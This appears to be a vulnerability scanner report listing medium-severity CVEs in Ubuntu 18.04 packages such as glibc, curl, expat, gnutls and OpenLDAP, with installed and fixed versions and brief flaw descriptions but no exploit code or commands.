Medium CVE-2018-11237 libc6-dev 2.27-3ubuntu12.27-3ubuntu1.2glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper libc6-dev:2.27-3ubuntu1
Medium CVE-2018-19591 libc6-dev 2.27-3ubuntu12.27-3ubuntu1.2glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c libc6-dev:2.27-3ubuntu1
Medium CVE-2020-1751 libc6-dev 2.27-3ubuntu12.27-3ubuntu1.2glibc: array overflow in backtrace functions for powerpc libc6-dev:2.27-3ubuntu1
Medium CVE-2021-3999 libc6-dev 2.27-3ubuntu12.27-3ubuntu1.5glibc: Off-by-one buffer overflow/underflow in getcwd() libc6-dev:2.27-3ubuntu1
Medium CVE-2019-5094 libcom-err2 1.44.1-11.44.1-1ubuntu1.2e2fsprogs: Crafted ext4 partition leads to out-of-bounds write libcom-err2:1.44.1-1
Medium CVE-2019-5188 libcom-err2 1.44.1-11.44.1-1ubuntu1.3e2fsprogs: Out-of-bounds write in e2fsck/rehash.c libcom-err2:1.44.1-1
Medium CVE-2022-1304 libcom-err2 1.44.1-11.44.1-1ubuntu1.4e2fsprogs: out-of-bounds read/write via crafted filesystem libcom-err2:1.44.1-1
Medium CVE-2018-0500 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.2curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-14618 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.3curl: NTLM password overflow via integer overflow libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-16839 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.5curl: Integer overflow leading to heap-based buffer overflow in Curl_sasl_create_plain_message() libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-16842 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.5curl: Heap-based buffer over-read in the curl tool warning formatting libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-16890 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.6curl: NTLM type-2 heap out-of-bounds buffer read libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-3822 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.6curl: NTLMv2 type-3 header stack buffer overflow libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-5436 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.7curl: TFTP receive heap buffer overflow in tftp_receive_packet() function libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-5481 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.8curl: double free due to subsequent call of realloc() libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2019-5482 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.8curl: heap buffer overflow in function tftp_receive_packet() libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2020-8177 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.9curl: Incorrect argument check can allow remote servers to overwrite local files libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2020-8285 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.12curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2020-8286 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.12curl: Inferior OCSP verification libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22876 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.13curl: Leak of authentication credentials in URL via automatic Referer libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22924 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.14curl: Bad connection reuse due to flawed path name checks libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22925 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.14curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22946 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.15curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2021-22947 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.15curl: Server responses received before STARTTLS processed after TLS handshake libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-22576 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.17curl: OAUTH2 bearer bypass in connection re-use libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-27774 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.17curl: credential leak on redirect libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-27782 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.18curl: TLS and SSH connection too eager reuse libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-32206 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.19curl: HTTP compression denial of service libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2022-32208 libcurl3-gnutls 7.58.0-2ubuntu3.17.58.0-2ubuntu3.19curl: FTP-KRB bad message verification libcurl3-gnutls:7.58.0-2ubuntu3.1
Medium CVE-2018-0500 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.2curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-14618 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.3curl: NTLM password overflow via integer overflow libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-16839 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.5curl: Integer overflow leading to heap-based buffer overflow in Curl_sasl_create_plain_message() libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-16842 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.5curl: Heap-based buffer over-read in the curl tool warning formatting libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2018-16890 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.6curl: NTLM type-2 heap out-of-bounds buffer read libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-3822 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.6curl: NTLMv2 type-3 header stack buffer overflow libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-5436 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.7curl: TFTP receive heap buffer overflow in tftp_receive_packet() function libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-5481 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.8curl: double free due to subsequent call of realloc() libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-5482 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.8curl: heap buffer overflow in function tftp_receive_packet() libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2020-8177 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.9curl: Incorrect argument check can allow remote servers to overwrite local files libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2020-8285 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.12curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2020-8286 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.12curl: Inferior OCSP verification libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22876 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.13curl: Leak of authentication credentials in URL via automatic Referer libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22924 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.14curl: Bad connection reuse due to flawed path name checks libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22925 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.14curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22946 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.15curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2021-22947 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.15curl: Server responses received before STARTTLS processed after TLS handshake libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-22576 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.17curl: OAUTH2 bearer bypass in connection re-use libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-27774 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.17curl: credential leak on redirect libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-27782 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.18curl: TLS and SSH connection too eager reuse libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-32206 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.19curl: HTTP compression denial of service libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2022-32208 libcurl4 7.58.0-2ubuntu3.17.58.0-2ubuntu3.19curl: FTP-KRB bad message verification libcurl4:7.58.0-2ubuntu3.1
Medium CVE-2019-8457 libdb5.3 5.3.28-13.1ubuntu15.3.28-13.1ubuntu1.1sqlite: heap out-of-bound read in function rtreenode() libdb5.3:5.3.28-13.1ubuntu1
Medium CVE-2022-1664 libdpkg-perl 1.19.0.5ubuntu21.19.0.5ubuntu2.4Dpkg::Source::Archive in dpkg, the Debian package management system, b ... libdpkg-perl:1.19.0.5ubuntu2
Medium CVE-2019-15903 libexpat1 2.2.5-32.2.5-3ubuntu0.2expat: heap-based buffer over-read via crafted XML input libexpat1:2.2.5-3
Medium CVE-2021-46143 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in doProlog in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22822 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in addBinding in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22823 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in build_model in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22824 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in defineAttribute in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22825 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in lookup in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22826 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in nextScaffoldPart in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-22827 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in storeAtts in xmlparse.c libexpat1:2.2.5-3
Medium CVE-2022-23852 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: Integer overflow in function XML_GetBuffer libexpat1:2.2.5-3
Medium CVE-2022-23990 libexpat1 2.2.5-32.2.5-3ubuntu0.4expat: integer overflow in the doProlog function libexpat1:2.2.5-3
Medium CVE-2022-25313 libexpat1 2.2.5-32.2.5-3ubuntu0.7expat: stack exhaustion in doctype parsing libexpat1:2.2.5-3
Medium CVE-2022-25314 libexpat1 2.2.5-32.2.5-3ubuntu0.7expat: integer overflow in copyString() libexpat1:2.2.5-3
Medium CVE-2022-25315 libexpat1 2.2.5-32.2.5-3ubuntu0.7expat: Integer overflow in storeRawNames() libexpat1:2.2.5-3
Medium CVE-2019-5094 libext2fs2 1.44.1-11.44.1-1ubuntu1.2e2fsprogs: Crafted ext4 partition leads to out-of-bounds write libext2fs2:1.44.1-1
Medium CVE-2019-5188 libext2fs2 1.44.1-11.44.1-1ubuntu1.3e2fsprogs: Out-of-bounds write in e2fsck/rehash.c libext2fs2:1.44.1-1
Medium CVE-2022-1304 libext2fs2 1.44.1-11.44.1-1ubuntu1.4e2fsprogs: out-of-bounds read/write via crafted filesystem libext2fs2:1.44.1-1
Medium CVE-2019-13627 libgcrypt20 1.8.1-4ubuntu1.11.8.1-4ubuntu1.2libgcrypt: ECDSA timing attack allowing private key leak libgcrypt20:1.8.1-4ubuntu1.1
Medium CVE-2021-40528 libgcrypt20 1.8.1-4ubuntu1.11.8.1-4ubuntu1.3libgcrypt: ElGamal implementation allows plaintext recovery libgcrypt20:1.8.1-4ubuntu1.1
Medium CVE-2019-13627 libgcrypt20-dev 1.8.1-4ubuntu1.11.8.1-4ubuntu1.2libgcrypt: ECDSA timing attack allowing private key leak libgcrypt20-dev:1.8.1-4ubuntu1.1
Medium CVE-2021-40528 libgcrypt20-dev 1.8.1-4ubuntu1.11.8.1-4ubuntu1.3libgcrypt: ElGamal implementation allows plaintext recovery libgcrypt20-dev:1.8.1-4ubuntu1.1
Medium CVE-2018-10844 libgnutls-dane0 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls-dane0 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls-dane0 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls-dane0 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: use-after-free/double-free in certificate verification libgnutls-dane0:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutls-openssl27 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls-openssl27 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls-openssl27 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls-openssl27 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: use-after-free/double-free in certificate verification libgnutls-openssl27:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutls28-dev 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls28-dev 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls28-dev 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls28-dev 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: use-after-free/double-free in certificate verification libgnutls28-dev:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutls30 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutls30:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutls30 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutls30:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutls30 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutls30:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutls30 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: use-after-free/double-free in certificate verification libgnutls30:3.5.18-1ubuntu1
Medium CVE-2018-10844 libgnutlsxx28 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-256 vulnerable to Lucky thirteen attack due to not enough dummy function calls libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2018-10845 libgnutlsxx28 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: HMAC-SHA-384 vulnerable to Lucky thirteen attack due to use of wrong constant libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2018-10846 libgnutlsxx28 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: "Just in Time" PRIME + PROBE cache-based side channel attack can lead to plaintext recovery libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2019-3829 libgnutlsxx28 3.5.18-1ubuntu13.5.18-1ubuntu1.1gnutls: use-after-free/double-free in certificate verification libgnutlsxx28:3.5.18-1ubuntu1
Medium CVE-2020-28196 libgssapi-krb5-2 1.16-2build11.16-2ubuntu0.2krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libgssapi-krb5-2:1.16-2build1
Medium CVE-2021-20305 libhogweed4 3.4-13.4-1ubuntu0.1nettle: Out of bounds memory access in signature verification libhogweed4:3.4-1
Medium CVE-2021-3580 libhogweed4 3.4-13.4.1-0ubuntu0.18.04.1nettle: Remote crash in RSA decryption via manipulated ciphertext libhogweed4:3.4-1
Medium CVE-2020-10531 libicu60 60.2-3ubuntu360.2-3ubuntu3.1ICU: Integer overflow in UnicodeString::doAppend() libicu60:60.2-3ubuntu3
Medium CVE-2019-12290 libidn2-0 2.0.4-1.1build22.0.4-1.1ubuntu0.2GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ... libidn2-0:2.0.4-1.1build2
Medium CVE-2019-18224 libidn2-0 2.0.4-1.1build22.0.4-1.1ubuntu0.2libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c libidn2-0:2.0.4-1.1build2
Medium CVE-2019-12290 libidn2-0-dev 2.0.4-1.1build22.0.4-1.1ubuntu0.2GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ... libidn2-0-dev:2.0.4-1.1build2
Medium CVE-2019-18224 libidn2-0-dev 2.0.4-1.1build22.0.4-1.1ubuntu0.2libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c libidn2-0-dev:2.0.4-1.1build2
Medium CVE-2019-12290 libidn2-dev 2.0.4-1.1build22.0.4-1.1ubuntu0.2GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ... libidn2-dev:2.0.4-1.1build2
Medium CVE-2019-18224 libidn2-dev 2.0.4-1.1build22.0.4-1.1ubuntu0.2libidn2: heap-based buffer overflow in idn2_to_ascii_4i in lib/lookup.c libidn2-dev:2.0.4-1.1build2
Medium CVE-2020-28196 libk5crypto3 1.16-2build11.16-2ubuntu0.2krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libk5crypto3:1.16-2build1
Medium CVE-2020-28196 libkrb5-3 1.16-2build11.16-2ubuntu0.2krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libkrb5-3:1.16-2build1
Medium CVE-2020-28196 libkrb5support0 1.16-2build11.16-2ubuntu0.2krb5: unbounded recursion via an ASN.1-encoded Kerberos message in lib/krb5/asn.1/asn1_encode.c may lead to DoS libkrb5support0:1.16-2build1
Medium CVE-2019-13565 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.3openldap: ACL restrictions bypass due to sasl_ssf value being set permanently libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-12243 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.5openldap: denial of service via nested boolean expressions in LDAP search filters libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25692 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.7openldap: NULL pointer dereference for unauthenticated packet in slapd libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25709 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.8openldap: assertion failure in Certificate List syntax validation libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25710 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.8openldap: assertion failure in CSN normalization with invalid input libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36221 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Integer underflow in serialNumberAndIssuerCheck in schema_init.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36222 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Assertion failure in slapd in the saslAuthzTo validation libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36223 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Out-of-bounds read in Values Return Filter libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36224 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Invalid pointer free in the saslAuthzTo processing libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36225 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Double free in the saslAuthzTo processing libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36226 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Denial of service via length miscalculation in slap_parse_user libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36227 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Infinite loop in slapd with the cancel_extop Cancel operation libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36228 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Integer underflow in issuerAndThisUpdateCheck in schema_init.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36229 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Type confusion in ad_keystring in ad.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36230 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Assertion failure in ber_next_element in decode.c libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2021-27212 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.10openldap: Assertion failure in slapd in the issuerAndThisUpdateCheck function libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2022-29155 libldap-2.4-2 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.11openldap: OpenLDAP SQL injection libldap-2.4-2:2.4.45+dfsg-1ubuntu1
Medium CVE-2019-13565 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.3openldap: ACL restrictions bypass due to sasl_ssf value being set permanently libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-12243 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.5openldap: denial of service via nested boolean expressions in LDAP search filters libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25692 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.7openldap: NULL pointer dereference for unauthenticated packet in slapd libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25709 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.8openldap: assertion failure in Certificate List syntax validation libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-25710 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.8openldap: assertion failure in CSN normalization with invalid input libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36221 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Integer underflow in serialNumberAndIssuerCheck in schema_init.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36222 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Assertion failure in slapd in the saslAuthzTo validation libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36223 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Out-of-bounds read in Values Return Filter libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36224 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Invalid pointer free in the saslAuthzTo processing libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36225 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Double free in the saslAuthzTo processing libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36226 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Denial of service via length miscalculation in slap_parse_user libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36227 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Infinite loop in slapd with the cancel_extop Cancel operation libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36228 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Integer underflow in issuerAndThisUpdateCheck in schema_init.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36229 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Type confusion in ad_keystring in ad.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2020-36230 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.9openldap: Assertion failure in ber_next_element in decode.c libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2021-27212 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.10openldap: Assertion failure in slapd in the issuerAndThisUpdateCheck function libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2022-29155 libldap-common 2.4.45+dfsg-1ubuntu12.4.45+dfsg-1ubuntu1.11openldap: OpenLDAP SQL injection libldap-common:2.4.45+dfsg-1ubuntu1
Medium CVE-2021-3520 liblz4-1 0.0~r131-2ubuntu30.0~r131-2ubuntu3.1lz4: memory corruption due to an integer overflow bug caused by memmove argument liblz4-1:0.0~r131-2ubuntu3
Medium CVE-2022-1271 liblzma5 5.2.2-1.35.2.2-1.3ubuntu0.1gzip: arbitrary-file-write vulnerability liblzma5:5.2.2-1.3
Medium CVE-2019-18218 libmagic-mgc 1:5.32-2ubuntu0.11:5.32-2ubuntu0.3file: heap-based buffer overflow in cdf_read_property_info in cdf.c libmagic-mgc:1:5.32-2ubuntu0.1
Medium CVE-2019-8906 libmagic-mgc 1:5.32-2ubuntu0.11:5.32-2ubuntu0.2file: out-of-bounds read in do_core_note in readelf.c libmagic-mgc:1:5.32-2ubuntu0.1
Medium CVE-2019-8907 libmagic-mgc 1:5.32-2ubuntu0.11:5.32-2ubuntu0.2file: do_core_note in readelf.c allows remote attackers to cause a denial of service libmagic-mgc:1:5.32-2ubuntu0.1
Medium CVE-2019-18218 libmagic1 1:5.32-2ubuntu0.11:5.32-2ubuntu0.3file: heap-based buffer overflow in cdf_read_property_info in cdf.c libmagic1:1:5.32-2ubuntu0.1
Medium CVE-2019-8906 libmagic1 1:5.32-2ubuntu0.11:5.32-2ubuntu0.2file: out-of-bounds read in do_core_note in readelf.c libmagic1:1:5.32-2ubuntu0.1
Medium CVE-2019-8907 libmagic1 1:5.32-2ubuntu0.11:5.32-2ubuntu0.2file: do_core_note in readelf.c allows remote attackers to cause a denial of service libmagic1:1:5.32-2ubuntu0.1
Medium CVE-2021-20305 libnettle6 3.4-13.4-1ubuntu0.1nettle: Out of bounds memory access in signature verification libnettle6:3.4-1
Medium CVE-2021-3580 libnettle6 3.4-13.4.1-0ubuntu0.18.04.1nettle: Remote crash in RSA decryption via manipulated ciphertext libnettle6:3.4-1
